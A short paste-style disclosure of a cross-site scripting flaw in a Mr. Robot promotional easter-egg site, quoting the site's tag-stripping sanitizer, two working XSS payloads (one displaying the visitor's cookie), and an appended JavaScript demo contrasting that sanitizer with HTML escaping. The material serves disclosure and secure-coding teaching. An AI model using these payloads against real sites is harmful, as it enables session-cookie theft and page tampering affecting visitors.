H0XH4

XSS vulnerability in the Mr. Robot easter egg website (S02E

Aug 12th, 2016
Season 2, Episode 6 Mr. Robot Easter egg has an XSS vulnerability. FSociety wrote a weak
function for sanitizing user input into their virtual shell ;)

The Easter egg can be accessed here:
http://l4713116.e-corp-usa.com/x/

The sanitize function:
// Blocklist approach: strips <...> sequences but never escapes quotes or angle brackets
function cleanInput(e){return tmp=striptags(e),tmp.replace(/<[^>]+>/gi,"").replace(/<script.*<\/script>/gi,"").replace(/<>/gi,"")}

XSS Payload:
"0xUID <3's Mr. Robot":
'">><marquee><img src=mrrobot onerror=confirm(String.fromCharCode(48,120,85,73,68,32,60,51,39,115,32,77,114,46,32,82,111,98,111,116))></marquee>">

Alert dialog displaying the user's cookie:
'">><marquee><img src=mrrobot onerror=confirm(document.cookie)></marquee>">

@0xUID
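As an added illustration (not part of the paste and not the site's own code) of why a tag-stripping cleaner like the one above is the wrong tool, the script below reproduces the cleaner's regex chain with a simplified stand-in for the striptags() library (assumption: the stand-in only removes complete <...> sequences, which is less than the real package does), runs the cookie payload from the paste through it, and contrasts the result with plain HTML entity escaping. The stripped value still carries the quote and angle-bracket characters the payload opens with, so it cannot be placed safely inside an attribute, whereas the escaped value contains none of them.

```javascript
// Added example: blocklist tag-stripping versus output escaping.
// Not the site's or the paste author's code.

// Assumption: a minimal stand-in for the striptags() library that the
// site's cleaner calls. It only removes complete <...> sequences.
function striptags(s) {
  return s.replace(/<[^>]*>/g, "");
}

// The site's cleaner, rewritten with a local variable so it runs in
// strict mode; the regex chain is the one quoted in the paste.
function cleanInput(e) {
  const tmp = striptags(e);
  return tmp
    .replace(/<[^>]+>/gi, "")
    .replace(/<script.*<\/script>/gi, "")
    .replace(/<>/gi, "");
}

// Context-aware alternative: encode every character that can change the
// HTML parser's state in text or attribute context, instead of guessing
// which tags to delete.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// True when a value can sit inside a quoted attribute without
// terminating it or opening a new tag.
function safeForAttribute(value) {
  return !/["'<>]/.test(value);
}

// Both rendering strategies echo the value inside an attribute, as a
// hypothetical "last command" field in the shell UI might.
function renderStripped(input) {
  return `<input value="${cleanInput(input)}">`;
}
function renderEscaped(input) {
  return `<input value="${escapeHtml(input)}">`;
}

// Sample input: the cookie-dialog payload quoted in the paste.
const PAYLOAD = `'">><marquee><img src=mrrobot onerror=confirm(document.cookie)></marquee>">`;

if (typeof require !== "undefined" && require.main === module) {
  console.log("stripped:", cleanInput(PAYLOAD));
  console.log("escaped :", escapeHtml(PAYLOAD));
  console.log("stripped value safe in attribute?", safeForAttribute(cleanInput(PAYLOAD)));
  console.log("escaped value safe in attribute? ", safeForAttribute(escapeHtml(PAYLOAD)));
  console.log(renderStripped(PAYLOAD));
  console.log(renderEscaped(PAYLOAD));
}
```

The design point is that stripping is a blocklist: it has to enumerate every construct that could be dangerous and gets no second chance when it misses one, while escaping on output is an allowlist that makes the browser treat the whole value as literal text regardless of what it contains.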